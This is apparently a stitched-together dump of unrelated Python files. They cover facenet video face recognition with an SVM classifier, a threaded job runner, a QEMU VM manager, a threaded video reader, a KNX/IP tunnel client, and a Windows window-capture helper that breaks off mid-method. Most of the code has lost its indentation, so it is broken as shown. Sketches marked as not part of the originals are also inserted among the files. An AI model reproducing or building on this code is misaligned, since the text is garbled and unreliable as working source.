svm_model = joblib.load(os.path.join(os.path.expanduser(args.svm_model_dir),'model.pkl'))
person_label = []
with tf.Graph().as_default():
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_memory_fraction)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))
with sess.as_default():
#Loading extracting feature network
print('Loading network used to extract features')
meta_file, ckpt_file = facenet.get_model_filenames(os.path.expanduser(args.model_dir))
print('Metagraph file: %s' % meta_file)
print('Checkpoint file: %s' % ckpt_file)
facenet.load_model(args.model_dir, meta_file, ckpt_file)
# Get input and output tensors
images_placeholder = tf.get_default_graph().get_tensor_by_name("input:0")
embeddings = tf.get_default_graph().get_tensor_by_name("embeddings:0")
phase_train_placeholder = tf.get_default_graph().get_tensor_by_name("phase_train:0")
image_size = images_placeholder.get_shape()[1]
embedding_size = embeddings.get_shape()[1]
t=time.time()
for num in nums:
print("Processing Frame {}".format(num))
time.sleep(0.01)
img = np.array(vid.get_data(num),dtype=np.uint8)
if num%interval == 0:
if num+interval >= nums[-1]:
break
img_next = np.array(vid.get_data(num+interval),dtype=np.uint8)
if proc != None:
dets = parent_conn.recv()
proc.join()
if len(dets) != nrof_person:
update_tracker(trackers, dets, img)
image_sets = crop_image(img, dets, args)
print(np.shape(image_sets))
feed_dict = { images_placeholder:image_sets, phase_train_placeholder:False }
person_label = predicted_label(sess, feed_dict, embeddings, svm_model)
# t = threading.Thread(target=predicted_label, args = (sess, feed_dict, embeddings, svm_model))
# t.daemon = True
# t.start()
nrof_person = len(dets)
proc = Process(target=detect_resize, args=(child_conn, img_next, detector, ))
proc.start()
# scaled, dets = detect_resize('d', img, detector, args, CROP_IMAGE=True)
# update_tracker(trackers, dets, img)
else:
# Else we just attempt to track from the previous frame
positions.clear()
if len(trackers) > 0:
for tracker in trackers:
tracker.update(img)
d=tracker.get_position()
positions.append(dlib.rectangle(int(d.left()), int(d.top()), int(d.right()), int(d.bottom())))
win.clear_overlay()
win.set_image(img)
win.add_overlay(positions, color=dlib.rgb_pixel(0,254,0))
win.set_title('-'.join(person_label))
# dlib.hit_enter_to_continue()
proc.join()
# print('Total number of images: %d' % nrof_images_total)
# print('Number of successfully aligned images: %d' % nrof_successfully_aligned)
# #Extracting features
# print('\n\nStarting to extract features')
# print('Crop pics spend %.3f seconds'% (time.time()-t))
# # Run forward pass to calculate embeddings
# t=time.time()
# print('Extract feature spend %.3f seconds'% (time.time()-t))
# ##Run SVM to predict images
# predicted_label = svm_model.predict(emb_array)
# print('Classifier spend %.3f seconds'% (time.time()-t))
# print('Predicted Persons')
# print(predicted_label)
# if not os.path.isdir(args.feature_dir): # Create the feature directory if it doesn't exist
# os.makedirs(args.feature_dir)
# file_name = os.path.join(os.path.expanduser(args.feature_dir),args.feature_name)
# np.savez(file_name, emb_array=emb_array, label=label_list)
def update_tracker(trackers, dets, img):
trackers[:] = []
for i, det in enumerate(dets):
trackers.append(dlib.correlation_tracker())
trackers[i].start_track(img, det)
def predicted_label(sess, feed_dict, embeddings, svm_model):
# Predicting people label
# feed_dict = { images_placeholder:[scaled], phase_train_placeholder:False }
t = time.time()
emb_array = sess.run(embeddings, feed_dict=feed_dict)
person_label = svm_model.predict(emb_array)
print('Predicted Persons, spending time ', time.time()-t)
print(person_label)
return person_label
def detect_resize(conn, img, detector):
if img.ndim<2:
        print('Unable to align image: unexpected number of dimensions')
return
if img.ndim == 2:
img = facenet.to_rgb(img)
img = img[:,:,0:3]
dets = detector(img, 1)
conn.send(dets)
def crop_image(img, dets, args):
bounding_boxes = []
for i, d in enumerate(dets):
bounding_boxes.append([d.left(), d.top(), d.right(), d.bottom()])
bounding_boxes=np.asarray(bounding_boxes)
nrof_faces = bounding_boxes.shape[0]
    if nrof_faces < 1:
return
image_sets = []
img_size = np.asarray(img.shape)[0:2]
bb = np.zeros(4, dtype=np.int32)
    for i in range(nrof_faces):
bb[0] = np.maximum(bounding_boxes[i,0]-args.margin/2, 0)
bb[1] = np.maximum(bounding_boxes[i,1]-args.margin/2, 0)
bb[2] = np.minimum(bounding_boxes[i,2]+args.margin/2, img_size[1])
bb[3] = np.minimum(bounding_boxes[i,3]+args.margin/2, img_size[0])
cropped = img[bb[1]:bb[3],bb[0]:bb[2],:]
scaled = misc.imresize(cropped, (args.image_size, args.image_size), interp='bilinear')
scaled=facenet.pre_precoss_data(scaled, False, False)
image_sets.append(scaled)
return image_sets
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--input_video', type=str, help='Path to video.', default='/cs/vml2/xca64/GitHub/pics/me.mp4')
parser.add_argument('--image_size', type=int,
help='Image size (height, width) in pixels.', default=182)
parser.add_argument('--margin', type=int,
help='Margin for the crop around the bounding box (height, width) in pixels.', default=44)
parser.add_argument('--gpu_memory_fraction', type=float,
help='Upper bound on the amount of GPU memory that will be used by the process.', default=1.0)
parser.add_argument('--model_dir', type=str,
help='Directory containing the metagraph (.meta) file and the checkpoint (ckpt) file containing model parameters')
parser.add_argument('--svm_model_dir', type=str, default='~/remote/models/svm',
help='Path to save the trained model')
return parser.parse_args(argv)
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
print('END')
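# Illustrative sketch (not part of the original script): building the argument
# namespace programmatically with parse_arguments() above instead of via the
# command line. All paths below are placeholders.
def _example_args():
    return parse_arguments(['--input_video', '/path/to/video.mp4',
                            '--model_dir', '/path/to/facenet_model',
                            '--svm_model_dir', '~/remote/models/svm',
                            '--image_size', '182'])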
|
mainparallel.py
|
import pandas as pd
from threading import Thread
from queue import Queue
import os
def runXsec(index, row):
print("\n \n \n ************Starting Job*****************\n \n \n")
if row['ranXSec'] == 0:
print("calculating xsections for: n1={}, n2={}, n3={}, j0= {}".format(row['n1'], row['n2'], row['n3'], row['j0']))
os.system('./xSection/calcXSection.sh {} {} {} {}'.format(row['n1'], row['n2'], row['n3'], row['j0']))
data.at[index,'ranXSec'] = 1
data.to_csv('input.csv',index=False)
else:
print("already calculated xsections for: n1={}, n2={}, n3={}, j0= {}".format(row['n1'], row['n2'], row['n3'], row['j0']))
return None
data = pd.read_csv('input.csv')
#Define jobs
que =Queue()
def worker():
while True:
index, row = que.get()
runXsec(index, row)
que.task_done()
N_cores=10
for i in range(N_cores):
thread=Thread(target=worker)
    thread.daemon = True  # daemonize the worker so the program can exit after que.join()
thread.start()
for index, row in data.iterrows():
#runXsec(index, row)
que.put((index, row))
que.join()
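# Illustrative sketch (not part of the original script): the same Queue plus
# worker-thread pattern in isolation, with daemon threads so the process can
# exit once join() returns. The names below are hypothetical.
def _example_thread_pool(jobs, handler, n_workers=4):
    q = Queue()
    def _worker():
        while True:
            item = q.get()
            handler(item)
            q.task_done()
    for _ in range(n_workers):
        Thread(target=_worker, daemon=True).start()
    for job in jobs:
        q.put(job)
    q.join()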
|
transient.py
|
from . import checked_threading
from . import configuration
from . import editor
from . import qemu
from . import image
from . import utils
from . import ssh
from . import sshfs
from . import static
import contextlib
import enum
import glob
import logging
import os
import pwd
import signal
import subprocess
import tempfile
import uuid
from typing import (
cast,
Iterator,
Optional,
Sequence,
List,
Dict,
Any,
Union,
Tuple,
TYPE_CHECKING,
)
# _Environ is declared as generic in stubs but not at runtime. This makes it
# non-subscriptable and will result in a runtime error. According to the
# MyPy documentation, we can bypass this: https://tinyurl.com/snqhqbr
if TYPE_CHECKING:
Environ = os._Environ[str]
else:
Environ = os._Environ
MAX_CONCURRENT_SSHFS = 7
@enum.unique
class TransientVmState(enum.Enum):
WAITING = (1,)
RUNNING = (2,)
FINISHED = (3,)
class TransientVm:
store: image.ImageStore
config: configuration.Config
vm_images: Sequence[image.BaseImageInfo]
ssh_config: Optional[ssh.SshConfig]
qemu_runner: Optional[qemu.QemuRunner]
qemu_should_die: bool
def __init__(self, config: configuration.Config, store: image.ImageStore) -> None:
self.store = store
self.config = config
self.vm_images = []
self.ssh_config = None
self.qemu_runner = None
self.qemu_should_die = False
self.name = self.config.name or self.__generate_tmp_name()
self.state = TransientVmState.WAITING
def __generate_tmp_name(self) -> str:
return str(uuid.uuid4())
def __create_images(self, names: List[str]) -> List[image.FrontendImageInfo]:
return [
self.store.create_vm_image(image_name, self.name, idx)
for idx, image_name in enumerate(names)
]
def __use_backend_images(self, names: List[str]) -> List[image.BackendImageInfo]:
"""Ensure the backend images are download for each image spec in 'names'"""
return [self.store.retrieve_image(name) for name in names]
def __needs_ssh(self) -> bool:
return (
self.config.ssh_console is True
or self.config.ssh_command is not None
or self.config.ssh_with_serial is True
or len(self.config.shared_folder) > 0
)
def __needs_ssh_console(self) -> bool:
return (
self.config.ssh_console is True
or self.config.ssh_with_serial is True
or self.config.ssh_command is not None
)
def __is_stateless(self) -> bool:
"""Checks if the VM does not require any persistent storage on disk"""
return (
not self.__needs_to_copy_out_files_after_running()
and not self.__needs_to_copy_in_files_before_running()
and self.config.name is None
)
def __do_copy_command(self, cmd: List[str], environment: Environ) -> None:
cmd_name = cmd[0]
try:
handle = subprocess.Popen(
cmd,
env=environment,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
_, raw_stderr = handle.communicate(timeout=self.config.copy_timeout)
if handle.poll() == 0:
return
except subprocess.TimeoutExpired:
handle.terminate()
_, raw_stderr = handle.communicate()
logging.error(
f"{cmd_name} timed out after {self.config.copy_timeout} seconds"
)
stderr = raw_stderr.decode("utf-8").strip()
raise RuntimeError(f"{cmd_name} failed: {stderr}")
def __needs_to_copy_in_files_before_running(self) -> bool:
"""Checks if at least one file or directory on the host needs to be copied into the VM
before starting the VM
"""
return len(self.config.copy_in_before) > 0
def __copy_in_files(self) -> None:
"""Copies the given files or directories (located on the host) into the VM"""
path_mappings = self.config.copy_in_before
for path_mapping in path_mappings:
self.__copy_in(path_mapping)
def __copy_in(self, path_mapping: str) -> None:
"""Copies the given file or directory (located on the host) into the VM"""
try:
host_path, vm_absolute_path = path_mapping.split(":")
except ValueError:
raise RuntimeError(
f"Invalid file mapping: {path_mapping}."
+ " -copy-in-before must be (path/on/host:/absolute/path/on/guest)"
)
if not os.path.exists(host_path):
raise RuntimeError(f"Host path does not exists: {host_path}")
if not vm_absolute_path.startswith("/"):
raise RuntimeError(f"Absolute path for guest required: {vm_absolute_path}")
for vm_image in self.vm_images:
assert isinstance(vm_image, image.FrontendImageInfo)
assert vm_image.backend is not None
logging.info(
f"Copying from '{host_path}' to '{vm_image.backend.identifier}:{vm_absolute_path}'"
)
with editor.ImageEditor(self.config, vm_image.path) as edit:
edit.copy_in(host_path, vm_absolute_path)
def __needs_to_copy_out_files_after_running(self) -> bool:
"""Checks if at least one directory on the VM needs to be copied out
to the host after stopping the VM
"""
return len(self.config.copy_out_after) > 0
def __copy_out_files(self) -> None:
"""Copies the given files or directories (located on the guest) onto the host"""
path_mappings = self.config.copy_out_after
for path_mapping in path_mappings:
self.__copy_out(path_mapping)
def __copy_out(self, path_mapping: str) -> None:
"""Copies the given file or directory (located on the guest) onto the host"""
try:
vm_absolute_path, host_path = path_mapping.split(":")
except ValueError:
raise RuntimeError(
f"Invalid file mapping: {path_mapping}."
+ " -copy-out-after must be (/absolute/path/on/guest:path/on/host)"
)
if not os.path.isdir(host_path):
raise RuntimeError(f"Host path does not exist: {host_path}")
if not vm_absolute_path.startswith("/"):
raise RuntimeError(f"Absolute path for guest required: {vm_absolute_path}")
for vm_image in self.vm_images:
assert isinstance(vm_image, image.FrontendImageInfo)
assert vm_image.backend is not None
logging.info(
f"Copying from '{vm_image.backend.identifier}:{vm_absolute_path}' to '{host_path}'"
)
with editor.ImageEditor(self.config, vm_image.path) as edit:
edit.copy_out(vm_absolute_path, host_path)
def __qemu_added_args(self) -> List[str]:
new_args = ["-name", self.name]
if self.__is_stateless():
new_args.append("-snapshot")
for image in self.vm_images:
new_args.extend(["-drive", f"file={image.path}"])
if self.__needs_ssh():
if self.__needs_ssh_console():
new_args.extend(["-serial", "stdio", "-display", "none"])
if self.config.ssh_port is None:
ssh_port = utils.allocate_random_port()
else:
ssh_port = self.config.ssh_port
self.ssh_config = ssh.SshConfig(
host="127.0.0.1",
port=ssh_port,
user=self.config.ssh_user,
ssh_bin_name=self.config.ssh_bin_name,
)
            # Forward the randomly allocated localhost port (or the user-provided port) to guest port 22
new_args.extend(
[
"-netdev",
f"user,id=transient-sshdev,hostfwd=tcp::{ssh_port}-:22",
"-device",
"e1000,netdev=transient-sshdev",
]
)
return new_args
def __connect_ssh(self) -> int:
assert self.ssh_config is not None
assert self.qemu_runner is not None
client = ssh.SshClient(config=self.ssh_config, command=self.config.ssh_command)
conn = client.connect_stdout(timeout=self.config.ssh_timeout)
conn.wait()
return conn.returncode
def __current_user(self) -> str:
return pwd.getpwuid(os.getuid()).pw_name
def __qemu_sigchld_handler(self, sig: int, frame: Any) -> None:
# We register this signal handler after the QEMU start, so these must not be None
assert self.qemu_runner is not None
assert self.qemu_runner.proc_handle is not None
        # Once we no longer have a QEMU process (i.e., the VM is 'finished'), it
# is an error to waitpid on the QEMU pid. However, we may still receive
# SIGCHLD during image cleanup for example (from the qemu-img calls). So,
# just return in this case.
if self.state == TransientVmState.FINISHED:
return
# We are only interested in the death of the QEMU child
pid, exit_indicator = os.waitpid(self.qemu_runner.proc_handle.pid, os.WNOHANG)
if (pid, exit_indicator) == (0, 0):
            # In this case, the process that sent SIGCHLD was not QEMU
return
else:
# According to the python docs, the exit_indicator is "a 16-bit number,
# whose low byte is the signal number that killed the process, and whose
# high byte is the exit status (if the signal number is zero); the high
# bit of the low byte is set if a core file was produced."
#
# Therefore, we check if the least significant 7 bits are unset, and if
# so, return the high byte. Otherwise, just return 1
signal_number = exit_indicator & 0x7F
if signal_number != 0:
exit_status = 1
else:
exit_status = exit_indicator >> 8
if self.qemu_should_die is True:
# We have reached a state where QEMU should be exiting (e.g., we have sent
# the system_shutdown QMP message). So don't error here.
logging.debug("QEMU process died as expected")
else:
logging.error("QEMU Process has died")
# NOTE: this will raise an exception if the exit_status is non-zero.
# otherwise, it will just return None. Because this is a signal handler,
# returning from this function will not cause the 'run' call to exit.
self.__post_run(exit_status)
def __post_run(self, returncode: int) -> None:
self.state = TransientVmState.FINISHED
if self.__needs_to_copy_out_files_after_running():
self.__copy_out_files()
# If the config name is None, this is a temporary VM,
# so remove any generated frontend images. However, if the
# VM is _totally_ stateless, there is nothing to remove
if self.config.name is None and not self.__is_stateless():
logging.info("Cleaning up temporary vm images")
for image in self.vm_images:
self.store.delete_image(image)
if returncode != 0:
logging.debug(f"VM exited with non-zero code: {returncode}")
raise utils.TransientProcessError(returncode=returncode)
return None
def run(self) -> None:
self.state = TransientVmState.RUNNING
if not self.__is_stateless():
# First, download and setup any required disks
self.vm_images = self.__create_images(self.config.image)
else:
# If the VM is completely stateless, we don't need to make our
# own frontend images, because we will be using the '-snapshot'
# feature to effectively do that. So just ensure the backend
# images have been downloaded.
self.vm_images = self.__use_backend_images(self.config.image)
if self.__needs_to_copy_in_files_before_running():
self.__copy_in_files()
if self.config.prepare_only is True:
return self.__post_run(0)
print("Finished preparation. Starting virtual machine")
added_qemu_args = self.__qemu_added_args()
full_qemu_args = added_qemu_args + self.config.qemu_args
# If we are using the SSH console, we need to do _something_ with QEMU output.
qemu_quiet, qemu_interactive = False, True
if self.__needs_ssh_console():
qemu_interactive = False
qemu_quiet = not self.config.ssh_with_serial
# Note that we must _not_ use QMP if we aren't using the SSH connection, because
# passing the `-qmp` arg causes QEMU to terminate on SIGINT, even when in
# `-nographic` mode, which is very surprising.
self.qemu_runner = qemu.QemuRunner(
full_qemu_args,
quiet=qemu_quiet,
interactive=qemu_interactive,
qmp_connectable=self.__needs_ssh_console(),
)
qemu_proc = self.qemu_runner.start()
# Register the exit signal handler for the qemu subprocess, then check if it
# had already died, just in case.
signal.signal(signal.SIGCHLD, self.__qemu_sigchld_handler)
qemu_returncode = qemu_proc.poll()
if qemu_returncode is not None:
logging.error("QEMU Process has died. Exiting")
return self.__post_run(qemu_returncode)
sshfs_threads = []
for shared_spec in self.config.shared_folder:
assert self.ssh_config is not None
local, remote = shared_spec.split(":")
# The user almost certainly doesn't intend to pass a relative path,
# so make it absolute
absolute_local_path = os.path.abspath(local)
sshfs_kwargs = {
"connect_timeout": self.config.ssh_timeout,
"ssh_config": self.ssh_config,
"local_dir": absolute_local_path,
"remote_dir": remote,
"local_user": self.__current_user(),
}
# Slamming the server with 20 connections at once is a good way to break things:
if len(sshfs_threads) > MAX_CONCURRENT_SSHFS:
sshfs_threads.pop(0).join()
sshfs_threads.append(
checked_threading.Thread(target=sshfs.do_sshfs_mount, kwargs=sshfs_kwargs)
)
sshfs_threads[-1].start()
for sshfs_thread in sshfs_threads:
sshfs_thread.join()
if self.__needs_ssh_console():
# Now wait until the QMP connection is established (this should be very fast).
assert self.qemu_runner.qmp_client is not None
self.qemu_runner.qmp_client.connect(self.config.qmp_timeout)
# Note that we always return the SSH exit code, even if the guest failed to
# shut down. This ensures the shutdown_timeout=0 case is handled as expected.
# (i.e., it returns the SSH code instead of a QEMU error)
returncode = self.__connect_ssh()
# In theory, we could get SIGCHLD from the QEMU process before getting or
# processing the SHUTDOWN event. So set this flag so we don't do the
# SIGCHLD exit.
self.qemu_should_die = True
try:
# Wait a bit for the guest to finish the shutdown and QEMU to exit
self.qemu_runner.shutdown(timeout=self.config.shutdown_timeout)
except subprocess.TimeoutExpired:
# if the timeout == 0, then the user expects the guest to not actually
# shutdown, so don't show an error here.
if self.config.shutdown_timeout > 0:
logging.error(
"Timeout expired while waiting for guest to shutdown (timeout={})".format(
self.config.shutdown_timeout
)
)
                # If we didn't reach the expected shutdown, this will terminate
                # the VM. Otherwise, this does nothing.
self.qemu_runner.terminate()
# Note that we always return the SSH exit code, even if the guest failed to
# shut down. This ensures the shutdown_timeout=0 case is handled as expected.
# (i.e., it returns the SSH code instead of a QEMU error)
return self.__post_run(returncode)
else:
returncode = self.qemu_runner.wait()
return self.__post_run(returncode)
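# Illustrative sketch (not part of transient itself): the waitpid status
# decoding used in __qemu_sigchld_handler above, as a standalone helper with
# example values. The helper name is hypothetical.
def _example_decode_exit_indicator(exit_indicator: int) -> int:
    signal_number = exit_indicator & 0x7F
    if signal_number != 0:
        # e.g. 0x0009 (killed by SIGKILL) is reported as exit status 1
        return 1
    # e.g. 0x0200 -> the high byte, 2, is the exit status
    return exit_indicator >> 8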
|
customFVS.py
|
# import the necessary packages
from threading import Thread
import cv2
import time
class FileVideoStream:
def __init__(self, path, transform=None, queue_size=16, num_queues=1, queue_type="Q"):
self.stream = cv2.VideoCapture(path)
self.stopped = False
self.transform = transform
self.num_queues = num_queues
self.queue_type = queue_type
self.qlist = []
if self.queue_type == "mQ":
from multiprocessing import Queue
else:
from queue import Queue
for _ in range(self.num_queues):
q = Queue(maxsize=queue_size)
self.qlist.append(q)
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
def start(self):
self.thread.start()
return self
def update(self):
while True:
if self.stopped:
break
if not self.qlist[0].full():
(grabbed, frame) = self.stream.read()
if not grabbed:
self.stopped = True
if self.transform:
frame = self.transform(frame)
for i in range(self.num_queues):
self.qlist[i].put(frame)
else:
time.sleep(0.1)
self.stream.release()
def read(self):
return self.qlist[0].get()
def running(self):
return self.more() or not self.stopped
def more(self):
tries = 0
while self.qlist[0].qsize() == 0 and not self.stopped and tries < 5:
time.sleep(0.1)
tries += 1
return self.qlist[0].qsize() > 0
def stop(self):
self.stopped = True
self.thread.join()
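# Illustrative sketch (not part of the original module): typical usage of the
# FileVideoStream class above. The video path is a placeholder.
def _example_usage(path="video.mp4"):
    fvs = FileVideoStream(path, queue_size=16).start()
    while fvs.running():
        frame = fvs.read()
        if frame is None:
            break
        cv2.imshow("frame", frame)
        if cv2.waitKey(1) & 0xFF == ord("q"):
            break
    fvs.stop()
    cv2.destroyAllWindows()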
|
ip.py
|
import socket
import threading
import logging
import socketserver
import queue
import time
from .core import KNXIPFrame,KNXTunnelingRequest,CEMIMessage
from . import util
logger = logging.getLogger(__name__)
class KNXIPTunnel(object):
# TODO: implement a control server
# control_server = None
data_server = None
control_socket = None
channel = 0
seq = 0
def __init__(self, ip, port, callback=None):
self.remote_ip = ip
self.remote_port = port
self.discovery_port = None
self.data_port = None
self.result_addr_dict = {}
self.result_dict = {}
self.unack_queue = queue.Queue()
self.callback = callback
self.read_timeout = 0.5
# Find my own IP
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((self.remote_ip,self.remote_port))
self.local_ip=s.getsockname()[0]
def connect(self):
"""
Connect to the KNX interface
"""
# create the data server
if self.data_server:
logger.info("Data server already running, not starting again")
else:
self.data_server = DataServer((self.local_ip, 0), DataRequestHandler)
self.data_server.tunnel = self
_ip, self.data_port = self.data_server.server_address
data_server_thread = threading.Thread(target=self.data_server.serve_forever)
data_server_thread.daemon = True
data_server_thread.start()
# initiate tunneling
self._initiate_tunneling()
def send_tunnelling_request(self, cemi):
"""
Send a request through the ip tunnel
Parameters
----------
cemi : knxpy.core.CEMIMessage
message as a cemi object
"""
f = KNXIPFrame(KNXIPFrame.TUNNELING_REQUEST)
b = bytearray([0x04,self.channel,self.seq,0x00]) # Connection header see KNXnet/IP 4.4.6 TUNNELLING_REQUEST
if (self.seq < 0xff):
self.seq += 1
else:
self.seq = 0
b.extend(cemi.to_body())
f.body=b
self.data_server.socket.sendto(f.to_frame(), (self.remote_ip, self.remote_port))
# TODO: wait for ack
def group_read(self, ga, dpt=None):
"""
Reads a value from the KNX bus
Parameters
----------
ga : string or int
the group address to write to as a string (e.g. '1/1/64') or an integer (0-65535)
dpt : string
the data point type of the group address, used to decode the result
Returns
-------
res :
the decoded value on the KNX bus
Notes
-----
This is still tricky, not all requests are answered and fast successive
read calls can lead to wrong answers
"""
if type(ga) is str:
addr = util.encode_ga(ga)
else:
addr = ga
self.result_addr_dict[addr] = True
cemi = CEMIMessage()
cemi.init_group_read(addr)
self.send_tunnelling_request(cemi)
# Wait for the result
res = None
starttime = time.time()
runtime = 0
while res is None and runtime < self.read_timeout:
if addr in self.result_dict:
res = self.result_dict[addr]
del self.result_dict[addr]
time.sleep(0.01)
runtime = time.time()-starttime
del self.result_addr_dict[addr]
if not res is None and not dpt is None:
res = util.decode_dpt(res,dpt)
return res
def group_write(self, ga, data, dpt=None):
"""
Writes a value to the KNX bus
Parameters
----------
ga : string or int
the group address to write to as a string (e.g. '1/1/64') or an integer (0-65535)
dpt : string
the data point type of the group address, used to encode the data
"""
if type(ga) is str:
addr = util.encode_ga(ga)
else:
addr = ga
        if dpt is not None:
            data = util.encode_dpt(data, dpt)
cemi = CEMIMessage()
cemi.init_group_write(addr, data)
self.send_tunnelling_request(cemi)
def _initiate_tunneling(self):
"""
Initiate the tunneling
"""
self.control_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.control_socket.bind((self.local_ip, 0))
# Connect packet
p=bytearray()
p.extend([0x06,0x10]) # header size, protocol version
p.extend(util.int_to_array(KNXIPFrame.CONNECT_REQUEST , 2))
p.extend([0x00,0x1a]) # total length = 24 octet
# Control endpoint
        p.extend([0x08,0x01]) # length 8 bytes, UDP
_ip,port=self.control_socket.getsockname()
p.extend(util.ip_to_array(self.local_ip))
p.extend(util.int_to_array(port, 2))
# Data endpoint
        p.extend([0x08,0x01]) # length 8 bytes, UDP
p.extend(util.ip_to_array(self.local_ip))
p.extend(util.int_to_array(self.data_port, 2))
#
p.extend([0x04,0x04,0x02,0x00])
self.control_socket.sendto(p, (self.remote_ip, self.remote_port))
try:
self.control_socket.settimeout(1)
received = bytearray(self.control_socket.recv(1024))
except:
raise Exception('Could not connect to knx gateway {}:{}'.format(self.remote_ip, self.remote_port))
else:
# Check if the response is an TUNNELING ACK
r_sid = received[2]*256+received[3]
if r_sid == KNXIPFrame.CONNECT_RESPONSE:
self.channel = received[6]
logger.debug("Connected KNX IP tunnel (Channel: {})".format(self.channel,self.seq))
# TODO: parse the other parts of the response
else:
raise Exception("Could not initiate tunnel connection, STI = {}".format(r_sid))
class DataRequestHandler(socketserver.BaseRequestHandler):
"""
Class handling messages from the KNX bus
"""
def handle(self):
data = self.request[0]
socket = self.request[1]
f = KNXIPFrame.from_frame(data)
if f.service_type_id == KNXIPFrame.TUNNELING_REQUEST:
req = KNXTunnelingRequest.from_body(f.body)
msg = CEMIMessage.from_body(req.cEmi)
send_ack = False
# print(msg)
tunnel = self.server.tunnel
if msg.code == 0x29:
# LData.req
send_ack = True
elif msg.code == 0x2e:
# LData.con
send_ack = True
else:
problem="Unimplemented cEMI message code {}".format(msg.code)
logger.error(problem)
raise Exception(problem)
logger.debug("Received KNX message {}".format(msg))
# Put RESPONSES into the result dict
if (msg.cmd == CEMIMessage.CMD_GROUP_RESPONSE) and msg.dst_addr in tunnel.result_addr_dict:
tunnel.result_dict[msg.dst_addr] = msg.data
# execute callback
if not tunnel.callback is None:
try:
tunnel.callback(msg)
except Exception as e:
logger.error("Error encountered durring callback execution: {}".format(e))
if send_ack:
bodyack = bytearray([0x04, req.channel, req.seq, KNXIPFrame.E_NO_ERROR])
ack = KNXIPFrame(KNXIPFrame.TUNNELLING_ACK)
ack.body = bodyack
socket.sendto(ack.to_frame(), self.client_address)
class DataServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
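# Illustrative sketch (assumptions noted; not part of the original module):
# typical usage of KNXIPTunnel above. 3671 is the conventional KNXnet/IP port;
# the gateway address and group address below are placeholders.
def _example_tunnel_usage(gateway_ip="192.168.1.10"):
    tunnel = KNXIPTunnel(gateway_ip, 3671)
    tunnel.connect()
    value = tunnel.group_read("1/1/64")  # raw value, no datapoint decoding
    tunnel.group_write("1/1/64", 1)      # raw write, no datapoint encoding
    return value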
|
rhba_utils.py
|
import os
import cv2
import time
import math
import ctypes
import random
import win32ui
import win32gui
import warnings
import win32con
import threading
import subprocess
import pytesseract
import numpy as np
import pydirectinput
from fuzzywuzzy import process
from custom_input import CustomInput
from win32api import GetSystemMetrics
os.chdir(os.path.dirname(os.path.abspath(__file__)))
warnings.simplefilter("ignore", DeprecationWarning)
class HsvFilter:
def __init__(self, hMin=None, sMin=None, vMin=None, hMax=None, sMax=None, vMax=None,
sAdd=None, sSub=None, vAdd=None, vSub=None):
self.hMin = hMin
self.sMin = sMin
self.vMin = vMin
self.hMax = hMax
self.sMax = sMax
self.vMax = vMax
self.sAdd = sAdd
self.sSub = sSub
self.vAdd = vAdd
self.vSub = vSub
class WindowCapture:
w = 0
h = 0
hwnd = None
cropped_x = 0
cropped_y = 0
offset_x = 0
offset_y = 0
def __init__(self, window_name=None, custom_rect=None):
self.custom_rect = custom_rect
self.window_name = window_name
if window_name is None:
self.hwnd = win32gui.GetDesktopWindow()
else:
self.hwnd = win32gui.FindWindow(None, window_name)
if not self.hwnd:
raise Exception('Window not found: {}'.format(window_name))
# Declare all the class variables
self.w, self.h, self.cropped_x, self.cropped_y
self.offset_x, self.offset_y
self.update_window_position()
def get_screenshot(self, stagger=False):
# get the window image data
try:
wDC = win32gui.GetWindowDC(self.hwnd)
dcObj = win32ui.CreateDCFromHandle(wDC)
cDC = dcObj.CreateCompatibleDC()
dataBitMap = win32ui.CreateBitmap()
dataBitMap.CreateCompatibleBitmap(dcObj, self.w, self.h)
cDC.SelectObject(dataBitMap)
cDC.BitBlt((0, 0), (self.w, self.h), dcObj,
(self.cropped_x, self.cropped_y), win32con.SRCCOPY)
except Exception as e:
print(e)
# print("Error with window handle, trying to continue")
count = 0
result = False
while not result:
time.sleep(0.05)
if stagger:
time.sleep(0.5)
try:
dcObj.DeleteDC()
cDC.DeleteDC()
win32gui.ReleaseDC(self.hwnd, wDC)
win32gui.DeleteObject(dataBitMap.GetHandle())
except:
pass
try:
self.hwnd = win32gui.FindWindow(None, self.window_name)
self.update_window_position()
wDC = win32gui.GetWindowDC(self.hwnd)
dcObj = win32ui.CreateDCFromHandle(wDC)
cDC = dcObj.CreateCompatibleDC()
dataBitMap = win32ui.CreateBitmap()
cDC.SelectObject(dataBitMap)
dataBitMap.CreateCompatibleBitmap(dcObj, self.w, self.h)
cDC.SelectObject(dataBitMap)
cDC.BitBlt((0, 0), (self.w, self.h), dcObj,
(self.cropped_x, self.cropped_y), win32con.SRCCOPY)
result = True
except Exception as e:
try:
dcObj.DeleteDC()
cDC.DeleteDC()
win32gui.ReleaseDC(self.hwnd, wDC)
win32gui.DeleteObject(dataBitMap.GetHandle())
except:
pass
count += 1
if count > 50:
# WindowCapture.list_window_names()
print(e)
print("Could not do handle multiple times")
os._exit(1)
# cDC.SelectObject(dataBitMap)
# cDC.BitBlt((0, 0), (self.w, self.h), dcObj,
# (self.cropped_x, self.cropped_y), win32con.SRCCOPY)
# convert the raw data into a format opencv can read
signedIntsArray = dataBitMap.GetBitmapBits(True)
        img = np.frombuffer(signedIntsArray, dtype='uint8')
img.shape = (self.h, self.w, 4)
# free resources
dcObj.DeleteDC()
cDC.DeleteDC()
win32gui.ReleaseDC(self.hwnd, wDC)
win32gui.DeleteObject(dataBitMap.GetHandle())
# drop the alpha channel
img = img[..., :3]
# make image C_CONTIGUOUS
img = np.ascontiguousarray(img)
return img
def focus_window(self):
win32gui.SetForegroundWindow(self.hwnd)
@staticmethod
def list_window_names():
def winEnumHandler(hwnd, ctx):
if win32gui.IsWindowVisible(hwnd):
print(hex(hwnd), win32gui.GetWindowText(hwnd))
win32gui.EnumWindows(winEnumHandler, None)
def update_window_position(self, border=True):
self.window_rect = win32gui.GetWindowRect(self.hwnd)
self.w = self.window_rect[2] - self.window_rect[0]
self.h = self.window_rect[3] - self.window_rect[1]
border_pixels = 8
titlebar_pixels = 30
if self.custom_rect is None:
if border:
self.w = self.w - (border_pixels * 2)
